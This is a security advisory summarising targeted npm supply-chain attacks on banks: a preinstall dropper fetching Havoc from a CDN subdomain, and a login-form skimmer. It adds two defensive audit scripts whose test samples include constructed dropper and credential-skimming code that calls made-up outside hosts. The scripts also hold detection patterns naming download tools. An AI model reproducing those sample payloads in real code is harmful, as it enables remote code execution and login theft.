Experts Warn of OSS Supply Chain Attacks Against the Banking Sector

Cyber Security Threat Summary:
“In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector. These attacks targeted specific components in web assets used by banks; according to the experts, the attackers used advanced techniques” (Security Affairs, 2023). The threat actors abused the npm registry to publish malicious packages that ran attacker-controlled code as soon as they were installed.

Using fake LinkedIn profiles, the threat actors contacted victim employees. Each target had its own command-and-control (C2) server, and the researchers noticed that the contributor behind the malicious packages was using a LinkedIn profile that posed as an employee of the victim bank.

Two malicious npm packages were published in April 2023. Both carried a preinstall script, which npm runs automatically during installation, and that script kicked off a multi-stage attack chain. First it collected system information, specifically the host operating system. Next it downloaded the second-stage malware from a remote server, connecting to an Azure CDN subdomain whose name included the name of the victim bank. Hosting the payload on an Azure CDN subdomain helps the traffic blend in and defeats traditional deny lists: the domain belongs to a legitimate cloud provider, so a defender cannot block the CDN's apex domain without also blocking every other tenant of that CDN, and the embedded bank name makes the hostname look expected to anyone who does inspect it.
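The preinstall-to-second-stage chain above is something an install-time audit can catch before `npm install` ever runs the hook. The following is an added example, not code from the Checkmarx report or from the packages it describes: a Node.js triage function that reads a package manifest, follows its lifecycle hooks into any bundled script they hand off to, and flags OS fingerprinting, download primitives, and hosts that sit under a shared cloud CDN apex. The package name, file and hostname in the samples are constructed, and the list of CDN apex domains is an assumption.

```javascript
// Added example (not code from the Checkmarx report or the packages it
// describes): offline triage of an npm package for install-time lifecycle
// hooks that behave like the dropper described above, i.e. a preinstall
// script that fingerprints the host OS and fetches a second stage from a
// tenant subdomain of a shared cloud CDN. Plain Node.js, no dependencies.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Assumption: apex domains of shared CDNs under which any tenant can create a
// subdomain. A deny-list keyed on the apex cannot block one tenant without
// blocking the whole CDN, which is why the report calls this a bypass.
const SHARED_CDN_APEX = ["azureedge.net", "cloudfront.net", "b-cdn.net"];

const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;
const OS_FINGERPRINT_RE = /\b(os\.platform|os\.type|os\.release|process\.platform|uname|systeminfo)\b/;
const DOWNLOADER_RE = /\b(https?\.get|https?\.request|fetch|axios|curl|wget|Invoke-WebRequest|certutil)\b/;
// "node ./setup.js" style hand-off to a file bundled in the package.
const SCRIPT_FILE_RE = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/;

function classifyHost(host) {
  const apex = SHARED_CDN_APEX.find(a => host === a || host.endsWith("." + a));
  return apex ? `tenant subdomain of shared CDN ${apex}` : "other host";
}

// pkg = { manifest: <package.json text>, files: { "<path>": <contents> } }
// Returns one finding per lifecycle hook present; an empty array means the
// package runs nothing at install time.
function auditPackage(pkg) {
  const manifest = JSON.parse(pkg.manifest);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const reasons = [];
    // Inspect the hook command plus whatever bundled file it hands off to,
    // since the manifest line itself is usually innocuous.
    let body = command;
    const m = SCRIPT_FILE_RE.exec(command);
    if (m && pkg.files && m[1] in pkg.files) {
      reasons.push(`runs bundled script ${m[1]} at install time`);
      body += "\n" + pkg.files[m[1]];
    }
    if (OS_FINGERPRINT_RE.test(body)) reasons.push("fingerprints the host operating system");
    if (DOWNLOADER_RE.test(body)) reasons.push("contains a network download primitive");
    for (const u of body.matchAll(URL_RE)) {
      const host = u[1].toLowerCase();
      reasons.push(`contacts ${host} (${classifyHost(host)})`);
    }
    const risk = reasons.length >= 3 ? "high" : reasons.length > 0 ? "medium" : "low";
    findings.push({ hook, command, reasons, risk });
  }
  return findings;
}

// Constructed sample modelled on the behaviour the article describes. The
// package name, file and hostname are made up, not indicators from the report.
const SAMPLE_DROPPER = {
  manifest: JSON.stringify({
    name: "example-ui-helpers",
    version: "1.0.3",
    scripts: { preinstall: "node ./setup.js" },
  }),
  files: {
    "setup.js": [
      "const os = require('os');",
      "const https = require('https');",
      "const stage2 = os.platform() === 'win32' ? 'win' : 'nix';",
      "https.get('https://examplebank-assets.azureedge.net/' + stage2, () => {});",
    ].join("\n"),
  },
};

// Constructed benign sample: a native-addon build step with no hand-off,
// no fingerprinting and no network activity.
const SAMPLE_BENIGN = {
  manifest: JSON.stringify({
    name: "example-native-addon",
    version: "2.0.0",
    scripts: { postinstall: "node-gyp rebuild" },
  }),
  files: {},
};

for (const f of auditPackage(SAMPLE_DROPPER)) {
  console.log(`[${f.risk}] ${f.hook}: ${f.command}`);
  for (const r of f.reasons) console.log(`  - ${r}`);
}
```

Run it with `node audit.js`. The cheaper control this example complements is to not run registry lifecycle scripts at all: `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), then allow-list the few packages that genuinely need a build step.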

The second-stage payload was the Havoc Framework, an open-source command-and-control framework that gives the operator post-exploitation capabilities comparable to Cobalt Strike, Sliver, and Brute Ratel. Cobalt Strike remains incredibly popular among threat actors, especially ransomware operators, but as defenders have gotten better at detecting it, criminals have experimented with alternatives such as Sliver, Brute Ratel, and now Havoc.

Security Officer Comments:
Threat actors also targeted a different bank in February 2023. In this campaign, they uploaded a malicious npm package whose payload was designed to blend into the victim bank's website and lie dormant until prompted by the attackers. “The payload revealed that the attacker had identified a unique element ID in the HTML of the login page and designed their code to latch onto a specific login form element, stealthily intercepting login data and then transmitting it to a remote location,” the report continues.
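The February payload is a client-side form skimmer: it looks up one login-form element by ID, hooks the submission, and ships the captured fields to a remote host. The following is an added example, not the payload and not code from the Checkmarx report: a static triage of a browser bundle for exactly that combination. Any one of the three primitives is ordinary front-end code; all three in one file that also names a credential field is rare in legitimate bank code and worth a human look. The two snippets it runs on are constructed, the hostnames are made up and are not indicators from the report, and the first-party hostname is an assumption supplied by the caller.

```javascript
// Added example (not the payload, and not code from the Checkmarx report):
// static triage of a browser-side script for the form-skimmer pattern
// described above. It flags a file only when three primitives co-occur:
// a DOM lookup of a credential-looking element, a hook on form submission
// or user input, and a network primitive that can ship data off-site.

const FORM_HOOK_RE = /\b(getElementById|querySelector(All)?|getElementsByName)\s*\(\s*['"`]([^'"`]+)['"`]/g;
// Assumption: element IDs and names worth caring about on a login page.
const CREDENTIAL_FIELD_RE = /(password|passwd|pwd|login|username|userid|otp|pin)/i;
const CAPTURE_RE = /addEventListener\s*\(\s*['"](submit|keyup|keydown|input|change|blur)['"]|\.onsubmit\s*=|new\s+FormData\s*\(/;
const EXFIL_RE = /\b(fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=\s*['"`]https?:)/;
const URL_HOST_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// src: JavaScript source text; ownHosts: hostnames the site legitimately
// talks to (first-party origin, known vendors), so only foreign hosts count.
function auditClientScript(src, ownHosts = []) {
  const hookedIds = [...src.matchAll(FORM_HOOK_RE)].map(m => m[3]);
  const credentialHooks = hookedIds.filter(id => CREDENTIAL_FIELD_RE.test(id));
  const externalHosts = [];
  for (const m of src.matchAll(URL_HOST_RE)) {
    const host = m[1].toLowerCase();
    if (!ownHosts.includes(host) && !externalHosts.includes(host)) externalHosts.push(host);
  }
  const captures = CAPTURE_RE.test(src);
  const exfil = EXFIL_RE.test(src);
  // Each primitive alone is ordinary front-end code; all three together in a
  // file that names a credential field is what warrants review.
  const suspicious = credentialHooks.length > 0 && captures && exfil;
  return { hookedIds, credentialHooks, captures, exfil, externalHosts, suspicious };
}

// Constructed samples. Hostnames are made up and are not indicators from the
// report; the first-party host is an assumption passed in by the caller.
const FIRST_PARTY = ["www.examplebank.test"];

// Ordinary client-side validation: hooks the password field and the submit
// event, but never touches the network.
const SAMPLE_VALIDATION = [
  "const form = document.getElementById('loginForm');",
  "const pw = document.getElementById('login-password');",
  "form.addEventListener('submit', e => {",
  "  if (pw.value.length < 12) { e.preventDefault(); pw.setCustomValidity('too short'); }",
  "});",
].join("\n");

// Skimmer-shaped code: same lookup and hook, plus a beacon to a foreign host.
const SAMPLE_SKIMMER = [
  "const f = document.getElementById('onlineBankingLoginForm');",
  "f.addEventListener('submit', () => {",
  "  const fields = Object.fromEntries(new FormData(f));",
  "  navigator.sendBeacon('https://static-assets.example-collector.net/p', JSON.stringify(fields));",
  "});",
].join("\n");

console.log(auditClientScript(SAMPLE_VALIDATION, FIRST_PARTY));
console.log(auditClientScript(SAMPLE_SKIMMER, FIRST_PARTY));
```

A heuristic like this is a build-pipeline gate, not a runtime defense: it cannot see a payload that stays dormant until triggered, and the exfiltration host may be fetched at run time rather than appear as a literal. Pair it with a Content Security Policy whose `connect-src` lists only the hosts the login page is allowed to talk to, so that an unexpected beacon fails and is reported even if the bundle audit misses it.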

Suggested Correction(s):
The researchers believe the two attacks are not linked. The npm packages were reported and subsequently removed; their names were not revealed. Checkmarx expects a steady escalation of such targeted attacks, including against banks.

The report published by Checkmarx includes indicators of compromise (IoCs) for these attacks.

Link(s):
https://securityaffairs.com/148757/cyber-crime/supply-chain-attack-banking-sector.html
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/